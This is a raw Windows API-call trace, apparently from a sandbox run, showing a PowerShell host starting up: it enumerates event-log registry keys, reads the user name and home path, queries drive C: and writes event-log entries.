	[0204.349] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x1, lpName=0x3e8150, lpcchName=0x17d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x17d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.351] CoTaskMemFree (pv=0x3e8150) 
	[0204.351] CoTaskMemFree (pv=0x0) 
	[0204.351] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0204.351] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x2, lpName=0x3e8150, lpcchName=0x17d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x17d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.352] CoTaskMemFree (pv=0x3e8150) 
	[0204.352] CoTaskMemFree (pv=0x0) 
	[0204.352] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0204.352] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x3, lpName=0x3e8150, lpcchName=0x17d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x17d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.353] CoTaskMemFree (pv=0x3e8150) 
	[0204.353] CoTaskMemFree (pv=0x0) 
	[0204.353] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0204.353] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x4, lpName=0x3e8150, lpcchName=0x17d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x17d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.355] CoTaskMemFree (pv=0x3e8150) 
	[0204.355] CoTaskMemFree (pv=0x0) 
	[0204.355] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0204.355] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x5, lpName=0x3e8150, lpcchName=0x17d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x17d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.356] CoTaskMemFree (pv=0x3e8150) 
	[0204.356] CoTaskMemFree (pv=0x0) 
	[0204.356] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0204.356] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x6, lpName=0x3e8150, lpcchName=0x17d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x17d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.357] CoTaskMemFree (pv=0x3e8150) 
	[0204.357] CoTaskMemFree (pv=0x0) 
	[0204.357] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0204.357] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x7, lpName=0x3e8150, lpcchName=0x17d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x17d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.359] CoTaskMemFree (pv=0x3e8150) 
	[0204.359] CoTaskMemFree (pv=0x0) 
	[0204.359] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0204.359] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x8, lpName=0x3e8150, lpcchName=0x17d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x17d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.360] CoTaskMemFree (pv=0x3e8150) 
	[0204.360] CoTaskMemFree (pv=0x0) 
	[0204.360] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d638 | out: phkResult=0x17d638*=0x30c) returned 0x0
	[0204.360] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d638 | out: phkResult=0x17d638*=0x0) returned 0x2
	[0204.360] RegOpenKeyExW (in: hKey=0x308, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d638 | out: phkResult=0x17d638*=0x320) returned 0x0
	[0204.360] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d638 | out: phkResult=0x17d638*=0x0) returned 0x2
	[0204.360] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d638 | out: phkResult=0x17d638*=0x32c) returned 0x0
	[0204.361] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d638 | out: phkResult=0x17d638*=0x0) returned 0x2
	[0204.361] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d638 | out: phkResult=0x17d638*=0x330) returned 0x0
	[0204.361] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d638 | out: phkResult=0x17d638*=0x0) returned 0x2
	[0204.361] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d638 | out: phkResult=0x17d638*=0x334) returned 0x0
	[0204.361] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d638 | out: phkResult=0x17d638*=0x0) returned 0x2
	[0204.361] RegOpenKeyExW (in: hKey=0x308, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d638 | out: phkResult=0x17d638*=0x338) returned 0x0
	[0204.361] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d638 | out: phkResult=0x17d638*=0x0) returned 0x2
	[0204.361] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d638 | out: phkResult=0x17d638*=0x0) returned 0x5
	[0204.375] RegOpenKeyExW (in: hKey=0x308, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d638 | out: phkResult=0x17d638*=0x33c) returned 0x0
	[0204.375] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d638 | out: phkResult=0x17d638*=0x0) returned 0x2
	[0204.375] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d638 | out: phkResult=0x17d638*=0x340) returned 0x0
	[0204.375] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d638 | out: phkResult=0x17d638*=0x344) returned 0x0
	[0204.375] RegCloseKey (hKey=0x344) returned 0x0
	[0204.375] RegCloseKey (hKey=0x308) returned 0x0
	[0204.376] RegCloseKey (hKey=0x340) returned 0x0
	[0204.953] CoTaskMemAlloc (cb=0x804) returned 0x1b7df860
	[0204.953] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7df860, nSize=0x17d848 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x17d848) returned 0x1
	[0204.955] CoTaskMemFree (pv=0x1b7df860) 
	[0204.956] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0204.956] GetUserNameW (in: lpBuffer=0x3e8150, pcbBuffer=0x17d888 | out: lpBuffer="aETAdzjz", pcbBuffer=0x17d888) returned 1
	[0204.956] CoTaskMemFree (pv=0x3e8150) 
	[0212.000] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d588 | out: phkResult=0x17d588*=0x348) returned 0x0
	[0212.000] RegQueryInfoKeyW (in: hKey=0x348, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x17d4fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x17d4f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x17d4fc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x17d4f8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.000] CoTaskMemFree (pv=0x0) 
	[0212.000] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0212.000] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x0, lpName=0x3e8150, lpcchName=0x17d588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x17d588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.000] CoTaskMemFree (pv=0x3e8150) 
	[0212.000] CoTaskMemFree (pv=0x0) 
	[0212.000] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0212.000] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x1, lpName=0x3e8150, lpcchName=0x17d588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x17d588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.000] CoTaskMemFree (pv=0x3e8150) 
	[0212.000] CoTaskMemFree (pv=0x0) 
	[0212.000] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0212.000] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x2, lpName=0x3e8150, lpcchName=0x17d588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x17d588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.000] CoTaskMemFree (pv=0x3e8150) 
	[0212.000] CoTaskMemFree (pv=0x0) 
	[0212.000] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0212.000] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x3, lpName=0x3e8150, lpcchName=0x17d588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x17d588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.000] CoTaskMemFree (pv=0x3e8150) 
	[0212.000] CoTaskMemFree (pv=0x0) 
	[0212.000] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0212.000] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x4, lpName=0x3e8150, lpcchName=0x17d588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x17d588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.000] CoTaskMemFree (pv=0x3e8150) 
	[0212.000] CoTaskMemFree (pv=0x0) 
	[0212.001] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0212.001] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x5, lpName=0x3e8150, lpcchName=0x17d588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x17d588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.001] CoTaskMemFree (pv=0x3e8150) 
	[0212.001] CoTaskMemFree (pv=0x0) 
	[0212.001] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0212.001] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x6, lpName=0x3e8150, lpcchName=0x17d588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x17d588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.001] CoTaskMemFree (pv=0x3e8150) 
	[0212.001] CoTaskMemFree (pv=0x0) 
	[0212.001] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0212.001] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x7, lpName=0x3e8150, lpcchName=0x17d588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x17d588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.001] CoTaskMemFree (pv=0x3e8150) 
	[0212.001] CoTaskMemFree (pv=0x0) 
	[0212.001] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0212.001] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x8, lpName=0x3e8150, lpcchName=0x17d588, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x17d588, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0212.001] CoTaskMemFree (pv=0x3e8150) 
	[0212.001] CoTaskMemFree (pv=0x0) 
	[0212.001] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d5e8 | out: phkResult=0x17d5e8*=0x34c) returned 0x0
	[0212.001] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d5e8 | out: phkResult=0x17d5e8*=0x0) returned 0x2
	[0212.001] RegOpenKeyExW (in: hKey=0x348, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d5e8 | out: phkResult=0x17d5e8*=0x350) returned 0x0
	[0212.001] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d5e8 | out: phkResult=0x17d5e8*=0x0) returned 0x2
	[0212.001] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d5e8 | out: phkResult=0x17d5e8*=0x354) returned 0x0
	[0212.001] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d5e8 | out: phkResult=0x17d5e8*=0x0) returned 0x2
	[0212.002] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d5e8 | out: phkResult=0x17d5e8*=0x358) returned 0x0
	[0212.002] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d5e8 | out: phkResult=0x17d5e8*=0x0) returned 0x2
	[0212.002] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d5e8 | out: phkResult=0x17d5e8*=0x35c) returned 0x0
	[0212.002] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d5e8 | out: phkResult=0x17d5e8*=0x0) returned 0x2
	[0212.002] RegOpenKeyExW (in: hKey=0x348, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d5e8 | out: phkResult=0x17d5e8*=0x360) returned 0x0
	[0212.002] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d5e8 | out: phkResult=0x17d5e8*=0x0) returned 0x2
	[0212.002] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d5e8 | out: phkResult=0x17d5e8*=0x0) returned 0x5
	[0212.843] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d5e8 | out: phkResult=0x17d5e8*=0x360) returned 0x0
	[0212.843] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d5e8 | out: phkResult=0x17d5e8*=0x0) returned 0x2
	[0212.843] RegOpenKeyExW (in: hKey=0x368, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d5e8 | out: phkResult=0x17d5e8*=0x364) returned 0x0
	[0212.843] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d5e8 | out: phkResult=0x17d5e8*=0x0) returned 0x2
	[0212.843] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x17d5e8 | out: phkResult=0x17d5e8*=0x0) returned 0x5
	[0212.861] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b8b0008
	[0212.869] ReportEventW (hEventLog=0x1b8b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2cd2038*="WSMan", lpRawData=0x2cd1da8) returned 1
	[0212.913] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0212.913] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0212.913] CoTaskMemFree (pv=0x42df80) 
	[0212.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0212.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0212.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0212.915] CoTaskMemAlloc (cb=0x804) returned 0x1b7df860
	[0212.915] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7df860, nSize=0x17d848 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x17d848) returned 0x1
	[0212.915] CoTaskMemFree (pv=0x1b7df860) 
	[0212.915] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0212.915] GetUserNameW (in: lpBuffer=0x3e8150, pcbBuffer=0x17d888 | out: lpBuffer="aETAdzjz", pcbBuffer=0x17d888) returned 1
	[0212.915] CoTaskMemFree (pv=0x3e8150) 
	[0212.916] ReportEventW (hEventLog=0x1b8b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2cd79c8*="Alias", lpRawData=0x2cd7758) returned 1
	[0212.929] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0212.929] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0212.929] CoTaskMemFree (pv=0x42df80) 
	[0212.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0212.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0212.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0212.931] CoTaskMemAlloc (cb=0x804) returned 0x1b7df860
	[0212.931] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7df860, nSize=0x17d848 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x17d848) returned 0x1
	[0212.931] CoTaskMemFree (pv=0x1b7df860) 
	[0212.931] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0212.931] GetUserNameW (in: lpBuffer=0x3e8150, pcbBuffer=0x17d888 | out: lpBuffer="aETAdzjz", pcbBuffer=0x17d888) returned 1
	[0212.931] CoTaskMemFree (pv=0x3e8150) 
	[0212.932] ReportEventW (hEventLog=0x1b8b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2cdcf70*="Environment", lpRawData=0x2cdcd00) returned 1
	[0212.967] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0212.968] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0212.968] CoTaskMemFree (pv=0x42df80) 
	[0212.969] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0212.969] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0212.969] CoTaskMemFree (pv=0x42df80) 
	[0212.969] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0212.969] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
	[0212.969] CoTaskMemFree (pv=0x42df80) 
	[0212.969] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x17d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0212.969] SetErrorMode (uMode=0x1) returned 0x1
	[0212.969] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x17d600 | out: lpFileInformation=0x17d600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0212.969] SetErrorMode (uMode=0x1) returned 0x1
	[0212.970] GetLogicalDrives () returned 0x4
	[0212.971] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x17d160, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.972] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0212.972] SetErrorMode (uMode=0x1) returned 0x1
	[0212.973] CoTaskMemAlloc (cb=0x68) returned 0x1b7be220
	[0212.973] CoTaskMemAlloc (cb=0x68) returned 0x1b7be290
	[0212.973] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b7be220, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x17d5d0, lpMaximumComponentLength=0x17d5cc, lpFileSystemFlags=0x17d5c8, lpFileSystemNameBuffer=0x1b7be290, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x17d5d0*=0x705ba84c, lpMaximumComponentLength=0x17d5cc*=0xff, lpFileSystemFlags=0x17d5c8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0212.973] CoTaskMemFree (pv=0x1b7be220) 
	[0212.973] CoTaskMemFree (pv=0x1b7be290) 
	[0212.973] SetErrorMode (uMode=0x1) returned 0x1
	[0212.973] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0212.974] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x17d310, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.974] SetErrorMode (uMode=0x1) returned 0x1
	[0212.974] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x17d570 | out: lpFileInformation=0x17d570*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0212.974] SetErrorMode (uMode=0x1) returned 0x1
	[0212.974] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x17d310, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.975] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x17d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.975] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0212.975] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x17d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.975] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0212.976] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x17d140, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.976] SetErrorMode (uMode=0x1) returned 0x1
	[0212.976] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x17d3a0 | out: lpFileInformation=0x17d3a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0212.976] SetErrorMode (uMode=0x1) returned 0x1
	[0212.976] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x17d140, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.976] SetErrorMode (uMode=0x1) returned 0x1
	[0212.976] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x17d3a0 | out: lpFileInformation=0x17d3a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0212.976] SetErrorMode (uMode=0x1) returned 0x1
